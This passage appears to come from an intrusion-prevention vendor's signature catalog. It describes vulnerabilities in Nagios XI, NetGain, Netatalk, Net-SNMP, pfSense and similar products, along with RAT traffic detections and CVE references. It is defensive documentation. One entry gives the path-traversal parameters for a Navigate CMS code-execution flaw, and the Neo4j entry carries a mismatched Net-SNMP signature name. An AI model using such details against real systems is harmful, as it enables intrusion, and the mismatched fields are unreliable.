Description:	A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of the phone parameter in users.php. A remote authenticated attacker can exploit this vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation:	HTTP_CRL-Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting

Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Nagios XI. The vulnerability is due to insufficient validation of username in users.php. A remote authenticated attacker can exploit this vulnerability by sending crafted request to the server. Successful exploitation could result in arbitrary script code execution on the client's browser.

Situation:

HTTP_CRL-Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting

References:

CVE-2020-27988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27988

Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection

About this vulnerability:	A vulnerability in Nagios XI
Risk:	Moderate
First detected in:	sgpkg-ips-1250-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nagios XI
Type:	Input Validation
Description:	There exists a command injection vulnerability in Nagios XI. Successful exploitation could lead in arbitrary command execution.
Situation:	HTTP_CRL-Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection

Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios XI

Risk:

High

First detected in:

sgpkg-ips-1289-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Nagios XI

Type:

Input Validation

Description:

There exists a vulnerability in Nagios XI, versions proir to 5.7.2, which allows remote attackers to execute arbitrary code via the link parameter in visFunctions.inc.php, due to improper user input validation.

Situation:

HTTP_CRL-Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting

References:

CVE-2020-15902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15902

Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Improper input validation of requests submitted to the functionality implemented in watchguard.inc.php causes a command injection vulnerability in Nagios XI. A successful exploit allows a remote attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection

References:

CVE-2021-37346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37346

Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises Nagios XI

Risk:

Moderate

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

Generic

Software:

Nagios XI

Type:

Input Validation

Description:

Improper validation of the url parameter in sshterm.php causes a cross-site scripting vulnerability in Nagios XI. A successful exploit allows an attacker to execute arbitrary code on a user's browser.

Situation:

HTTP_CSU-Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting

References:

CVE-2021-25299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25299

NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Nagios Enterprises NagiosQL

Risk:

Moderate

First detected in:

sgpkg-ips-560-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NagiosQL

Type:

Input Validation

Description:

A cross site scripting vulnerability exists in NagiosQL. The vulnerability is due to lack of input validation on the txtSearch parameter passed to the hostdependencies.php resource. A remote attacker could exploit this vulnerability by enticing a user to follow a crafted link or view a webpage. Successful exploitation could result in attacker controlled script code being executed in the browser of the enticed user.

Situation:

HTTP_CRL-NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting

References:

CVE-2013-6039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6039

OSVDB-100612
http://www.osvdb.org/100612

Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248

About this vulnerability:

A vulnerability in NAKIVO Backup and Replication

Risk:

High

First detected in:

sgpkg-ips-1854-5242

Last changed:

sgpkg-ips-1854-5242

Platform:

Generic

Software:

NAKIVO Backup and Replication

Type:

Directory Traversal

Description:

An arbitrary file read vulnerability has been reported in NAKIVO Backup and Replication versions before 11.0.0.88174. This vulnerability is due to an absolute path traversal in getImageByPath and may allow remote code execution.

Situation:

File-Text_Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248

References:

CVE-2024-48248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48248

NanoCore-RAT-C2-Traffic

About this vulnerability:	NanoCore RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1091-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	NanoCore is a remote access trojan (RAT) that can be modified to include additional plugins.
Situation:	Generic_CS_NanoCore-RAT-C2-Traffic

Nanopool-Claymore-Dual-Miner-RCE

About this vulnerability:

A vulnerability in Nanopool Claymore Dual Miner

Risk:

Moderate

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Claymore Dual GPU Miner

Type:

Input Validation

Description:

A vulnerability in Nanopool Claymore Dual Miner, versions 7.3 and before, which allows remote attackers to execute arbitrary code through parameters in the miner API.

Situation:

Generic_CS-Nanopool-Claymore-Dual-Miner-RCE

References:

CVE-2018-1000049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000049

Nas4Free-Remote-Command-Execution

About this vulnerability:

Nas4Free Remote Command Execution

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nas4Free

Type:

PHP Injection

Description:

There is a remote command execution vulnerability in Nas4Free software NAS solution. An authenticated user can exploit this by executing arbitrary PHP code within the target system.

Situation:

HTTP_CRL-Nas4Free-Remote-Command-Execution

References:

CVE-2013-3631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3631

OSVDB-99142
http://www.osvdb.org/99142

National-Instruments-Installer-Framework-ActiveX-Arbitrary-File-Creation

About this vulnerability:

A vulnerability in National Instruments Installer Framework

Risk:

Moderate

First detected in:

sgpkg-ips-532-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

National Instruments Installer Framework; ABB DataManager

Type:

Directory Traversal

Description:

There is an arbitrary file writing vulnerability in the National Instruments Installer Framework. The vulnerability is due to the exposure of an insecure method ExportStyle() by multiple ActiveX controls shipped as a part of the product. An attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page or to view a malicious document. Successful exploitation would allow an attacker to create arbitrary files with attacker-controlled contents, which could eventually lead to arbitrary command execution on the target machine. Note that this vulnerability may be exposed by third-party products, which incorporate National Instruments products.

Situation:

File-Text_National-Instruments-Installer-ActiveX-Arbitrary-File-Creation

References:

OSVDB-94425
http://www.osvdb.org/94425

NaviCOPA-Web-Server-Buffer-Overflow

About this vulnerability:

NaviCOPA Web Server 2.01 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NaviCOPA

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in NaviCOPA Web Server 2.01 which allows remote attackers to execute arbitrary code, or cause a denial of service condition,via a long HTTP GET request.

Situation:

HTTP_CSU-NaviCOPA-Web-Server-Buffer-Overflow

References:

CVE-2006-5112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5112

BID-20250
http://www.securityfocus.com/bid/20250

OSVDB-29257
http://www.osvdb.org/29257

Navigate-CMS-Unauthenticated-Remote-Code-Execution

About this vulnerability:

A vulnerability in Navigate CMS

Risk:

High

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Navigate CMS

Type:

Code Injection

Description:

A vulnerability in Navigate CMS, versions 2.8 and before, in navigate_upload.php which allows remote attackers to execute arbitrary code via a POST request with engine=picnik and id=../../../navigate_info.php.

Situation:

HTTP_CSU-Navigate-CMS-Unauthenticated-Remote-Code-Execution

References:

CVE-2018-17553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17553

NBD-Network-Block-Device-Server-Long-Request-Buffer-Overflow

About this vulnerability:

A long request to the NBD server causes a buffer overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

NBD Server

Type:

Buffer Overflow

Description:

The NBD server suffers from a vulnerability where a large client request results in a buffer overflow. The server reserves a one megabyte buffer for client requests, but does not sufficiently check input sizes. A client request where the request data is smaller than the buffer, but the size of the whole request including request headers is larger than the buffer results in a buffer overflow. The vulnerability allows remote attackers to execute arbitrary code on the server with a successful attack.

Situation:

Generic_Network-Block-Device-Server-Long-Request-Buffer-Overflow

References:

CVE-2005-3534
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534

BID-16029
http://www.securityfocus.com/bid/16029

OSVDB-21848
http://www.osvdb.org/21848

NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal

About this vulnerability:	A vulnerability in NEC ESMPRO Manager
Risk:	Moderate
First detected in:	sgpkg-ips-1267-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NEC ESMPRO Manager
Type:	Directory Traversal
Description:	Improper validation of the user-supplied path in GetEuaLogDownloadAction class causes a directory traversal vulnerability in NEC ESMPRO Manager. A successful attack may allow an attacker to read arbitrary files on the target system.
Situation:	HTTP_CRL-NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal

NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in NEC EXPRESSCLUSTER X

Risk:

Moderate

First detected in:

sgpkg-ips-1280-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NEC EXPRESSCLUSTER X

Type:

Input Validation

Description:

There has been reported an XML external entity injection vulnerability in NEC ExpressCluster. Successful exploitation could result in a disclosure of sensitive information.

Situation:

HTTP_CRL-NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection

References:

CVE-2020-17408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17408

Necta-LLC-WiFi-Mouse-RCE

About this vulnerability:

A vulnerability in the Necta LLC Wifi Mouse server.

Risk:

High

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

Necta LLC

Type:

Input Validation

Description:

A vulnerability in the Necta LLC Wifi Mouse server, verions 1.8.3.4 and 1.8.2.3, that allow remote attackers to bypass authentication and open programs on the server and type commands that will be executed as the user running WiFi Mouse (Mouse Server).

Situation:

HTTP_CS-Necta-LLC-WiFi-Mouse-RCE

References:

CVE-2022-3218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3218

Need2Find-Toolbar

About this vulnerability:	Need2Find Internet Explorer Toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Need2Find Toolbar
Type:	Misconfiguration
Description:	Need2Find Toolbar is a toolbar for Internet Explorer. It displays advertisements and may be considered unwanted software by some organizations.
Situation:	HTTP_CSH-Need2Find-Toolbar-Activity

Neo4J-Shell-Server-setSessionVariable-Deserialization-CVE-2021-34371

About this vulnerability:

An attempt to exploit a vulnerability in Neo4j detected

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Neo4j

Type:

Input Validation

Description:

Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through "setSessionVariable". An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.

Situation:

SNMP-UDP_Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference

References:

CVE-2021-34371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34371

Nerbian-RAT-C2-Traffic

About this vulnerability:	Nerbian RAT command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1468-5242
Last changed:	sgpkg-ips-1468-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	An HTTP request that matches a known Nerbian RAT command and control traffic pattern was detected.
Situation:	HTTP_CRL-Nerbian-RAT-C2-Traffic

Nessus-Vulnerability-Scanner-Usage

About this vulnerability:	Nessus vulnerability scanner usage detection
Risk:	Low
First detected in:	sgpkg-ips-159-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Nessus
Type:	Vulnerability Scanner
Description:	Nessus is a vulnerability scanner that can be used to scan hosts for remotely exploitable vulnerabilities. Nessus is a useful tool for network administrators, but can also be used by attackers looking for vulnerable hosts to exploit.
Situation:	Generic_UDP-Nessus-Vulnerability-Scanner-Usage HTTP_CSU-Nessus-Vulnerability-Scanner-Usage FTP_CS-Nessus-Vulnerability-Scanner-Usage NetBIOS-TCP_Nessus-Vulnerability-Scanner-Usage MSRPC-TCP_CS-Nessus-Vulnerability-Scanner-Usage SMB-TCP_CHS-Nessus-Vulnerability-Scanner-Usage Generic_CS-Nessus-Vulnerability-Scanner-Usage TFTP_Nessus-Vulnerability-Scanner-Usage

Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Net-SNMP

Risk:

Moderate

First detected in:

sgpkg-ips-1537-5242

Last changed:

sgpkg-ips-1537-5242

Platform:

Generic

Software:

Net-SNMP

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in handle_ipDefaultTTL function in Net-SNMP. This vulnerability is due to improper validation of parameters of the SET SNMP operation. A remote attacker could exploit this vulnerability by sending a crafted SNMP packet requesting a SET operation on the default TTL scalar to the targeted device. Successful exploitation could result in denial of service conditions on the target server.

Situation:

References:

CVE-2022-44792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44792

Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Net-SNMP

Risk:

Moderate

First detected in:

sgpkg-ips-1550-5242

Last changed:

sgpkg-ips-1550-5242

Platform:

Generic

Software:

Net-SNMP

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in handle_ipv6IpForwarding function in Net-SNMP. This vulnerability is due to improper validation of parameters of the SET SNMP operation. A remote attacker could exploit this vulnerability by sending a crafted SNMP packet requesting a SET operation on the ipv6IpForwarding flag to the targeted device. Successful exploitation could result in denial of service conditions on the target server.

Situation:

SNMP-UDP_Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference

References:

CVE-2022-44793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44793

Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution

About this vulnerability:	A vulnerability in Net-SNMP
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	Net-SNMP
Type:	Insecure Configuration
Description:	A vulnerability in Net-SNMP which allows remote attackers to execute arbitrary code through the SNMP write access configuration ability of SNMP-EXTEND-MIB.
Situation:	SNMP-UDP_Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution

NetAlertX-Unauthenticated-Arbitrary-File-Read

About this vulnerability:

A vulnerability in NetAlertX

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Linux

Software:

NetAlertX

Type:

Directory Traversal

Description:

A vulnerability in NetAlertX, versions prior to v24.10.12, which allows remote attackers to read sensitive files on a target system via a directory traversal, due to the lack of user input validation.

Situation:

HTTP_CS-NetAlertX-Unauthenticated-Arbitrary-File-Read

References:

CVE-2024-48766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48766

Netatalk-Dsi_opensession-Attention-Quantum-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Netatalk Netatalk

Risk:

Moderate

First detected in:

sgpkg-ips-1125-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netatalk

Type:

Malfunction

Description:

A missing bounds check in the handling of the DSI Opensession command in Netatalk causes an out of bound write vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Netatalk-Dsi_Ppensession-Attention-Quantum-Out-Of-Bounds-Write

References:

CVE-2018-1160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1160

Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Netatalk

Risk:

High

First detected in:

sgpkg-ips-1562-5242

Last changed:

sgpkg-ips-1562-5242

Platform:

Generic

Software:

Netatalk

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Netatalk. The vulnerability is due to improper validation of the length of user-supplied data. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target application. Successful exploitation could lead to execution of arbitrary code under the security context of the root user.

Situation:

Generic_CS-Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability

References:

CVE-2022-43634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43634

NetBIOS-CS-Samba-Long-Password-BO

About this vulnerability:

NetBIOS Long Password Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

Samba contains a buffer overflow vulnerability in the handling of the password field, allowing an attacker to gain elevated system privileges through a long password.

Situation:

SMB-TCP_CHS-Samba-Long-Password-BO

References:

CVE-1999-0182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0182

BID-1816
http://www.securityfocus.com/bid/1816

NetBIOS-LSASS-BOF

About this vulnerability:

Buffer overflow vulnerability in LSASS (MS04-011)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003; Windows 98; Windows ME

Software:

LSASS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows. A remote attacker can use this vulnerability to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-LSASS-BOF

References:

CVE-2003-0533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0533

BID-10108
http://www.securityfocus.com/bid/10108

MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011

NetBIOS-NT4-RFPoison-DoS

About this vulnerability:

RFPoison denial of service against NT4

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0

Software:

RPC

Type:

Malfunction

Description:

Microsoft Windows NT 4.0 has a vulnerability in the handling of certain MSRPC calls in services.exe. An attacker can exploit this vulnerability to cause denial of service.

Situation:

NetBIOS-TCP_RFPoison

References:

CVE-1999-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0980

BID-754
http://www.securityfocus.com/bid/754

MS99-055
http://technet.microsoft.com/security/bulletin/MS99-055

NetBIOS-Remote-Registry-Request-DoS-MS00-040

About this vulnerability:

Microsoft Windows Remote Registry Request Denial of Service (MS00-040)

Risk:

Low

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0

Software:

<os>

Type:

Malfunction

Description:

Windows NT 4.0 is vulnerable to a denial of service attack if it is configured to allow remote registry requests. An authenticated user on the network could send a malformed remote registry request to the system to cause the winlogin.exe to crash. The system would have to be restarted to resume normal functionality.

Situation:

MSRPC-TCP_CPS-Remote-Registry-Request-DoS

References:

CVE-2000-0377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0377

BID-1331
http://www.securityfocus.com/bid/1331

MS00-040
http://technet.microsoft.com/security/bulletin/MS00-040

NetBiter-webSCADA-Multiple-Vulnerabilities

About this vulnerability:	A vulnerability in Netbiter webSCADA
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NetBiter webSCADA
Type:	Malfunction
Description:	There are multiple information disclosure vulnerabilities in Netbiter webSCADA.
Situation:	HTTP_CSU-NetBiter-webSCADA-User-Information-Disclosure HTTP_CSU-NetBiter-webSCADA-Local-File-Disclosure

Netcat-Stack-Buffer-Overflow

About this vulnerability:

A Netcat Stack Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netcat

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Netcat, version 1.10 NT, which allows remote attackers to execute arbitrary code via an overly long string.

Situation:

Generic_CS-Netcat-Stack-Buffer-Overflow

References:

CVE-2004-1317
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1317

BID-12106
http://www.securityfocus.com/bid/12106

OSVDB-12612
http://www.osvdb.org/12612

NetCode-Book-Cgi-System-Compromise

About this vulnerability:

NetCode book.cgi Input Validation System Compromise

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

NetCode NC Book

Type:

Input Validation

Description:

NetCode NC Book 0.2b book.cgi guest book contains an input validation flaw that allows an attacker to execute arbitrary commands leading to a system compromise.

References:

CVE-2001-1114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1114

BID-3178
http://www.securityfocus.com/bid/3178

NetData-Streaming-Alert-Command-Injection

About this vulnerability:

A vulnerability in Netdata netdata

Risk:

Moderate

First detected in:

sgpkg-ips-1559-5242

Last changed:

sgpkg-ips-1559-5242

Platform:

Generic

Software:

NetData

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Netdata. The vulnerability is due to improper input validation when processing stream requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in command injection.

Situation:

HTTP_CS-NetData-Streaming-Alert-Command-Injection

References:

CVE-2023-22496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22496

NetDecision-TFTP-Directory-Traversal-Execution

About this vulnerability:

A NetDecision TFTP Directory Traversal Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetMechanica NetDecision

Type:

Directory Traversal

Description:

A vulnerability in NetDecision TFTP version 4.2 which allows remote attackers to perform a directory traversal on a read or write command.

Situation:

TFTP_NetDecision-TFTP-Directory-Traversal-Execution

References:

CVE-2009-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1730

BID-35002
http://www.securityfocus.com/bid/35002

OSVDB-54607
http://www.osvdb.org/54607

Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1035-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

There has been reported a vulnerability in NetGain Systems Enterprise Manager. This vulnerability is due to improper validation of HTTP parameter. A remote attacker could send crafted requests to a vulnerable server, which could result in arbitrary command execution.

Situation:

HTTP_CRL-Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution

References:

CVE-2017-16602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16602

Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

Improper validation of request paths causes a directory traversal vulnerability in NetGain Systems Enterprise Manager. A successful exploit allows an attacker to cause a denial of service condition resulting from the deletion of arbitrary files on the target system.

Situation:

HTTP_CSU-Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal

References:

CVE-2017-16599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16599

Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

There has been reported a deserialization vulnerability in the NetGain Systems Enterprise Manager. Exploiting the vulnerability could lead to arbitrary code execution.

Situation:

Generic_CS-Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization

References:

CVE-2017-17406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17406

Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

There has been reported a directory traversal vulnerability in NetGain Systems Enterprise Manager. This vulnerability can be exploited by a remote attacker. Successful exploitation could lead to arbitrary code execution.

Situation:

HTTP_CSH-Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal

References:

CVE-2017-16603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16603

Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

A directory traversal vulnerability exists in NetGain Systems Enterprise Manager. The vulnerability is due to an input validation while processing ip parameter in org.apache.jsp.u.jsp.tools.snmpwalk.snmpwalk_005fdo_jsp servlet. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation could allow an attacker to execute arbitrary code under the context of Administrator.

Situation:

HTTP_CSU-Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal

References:

CVE-2017-16598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16598

Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in NetGain Systems Enterprise Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1062-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetGain Systems Enterprise Manager

Type:

Input Validation

Description:

Improper input validation when processing TFTP WRQ packets causes a directory traversal vulnerability in NetGain Enterprise Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

TFTP_CS-Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal

References:

CVE-2017-16597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16597

Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

Moderate

First detected in:

sgpkg-ips-1172-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

There has been reported a stored cross-site scripting vulnerability in Netgate pfSense. This vulnerability could be exploited by an authenticated remote attacker. Successful exploitation could lead in arbitrary script code execution in the target user's browser.

Situation:

HTTP_CRL-Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting

References:

CVE-2019-12347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12347

Netgate-Pfsense-Command-Injection-CVE-2023-42326

About this vulnerability:

An attempt to exploit a vulnerability in PfSense detected

Risk:

High

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

An issue in Netgate pfSense v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the "interfaces_gif_edit.php" and "interfaces_gre_edit.php" components.

Situation:

HTTP_CRL-Netgate-Pfsense-Command-Injection-CVE-2023-42326

References:

CVE-2023-42326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42326

Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

High

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

PfSense

Type:

Cross-site Scripting

Description:

A reflected cross-site scripting vulnerability has been reported in Netgate pfSense. A remote attacker can exploit this vulnerability by tricking a pfSense user into clicking a maliciously crafted link. If the victim has pfSense administrator privileges, this vulnerability can lead to remote code execution.

Situation:

HTTP_CRL-Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325

References:

CVE-2023-42325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42325

Netgate-Pfsense-Diag_packet_capture.php-Command-Injection

About this vulnerability:

A vulnerability in Netgate pfSense

Risk:

High

First detected in:

sgpkg-ips-1668-5242

Last changed:

sgpkg-ips-1668-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

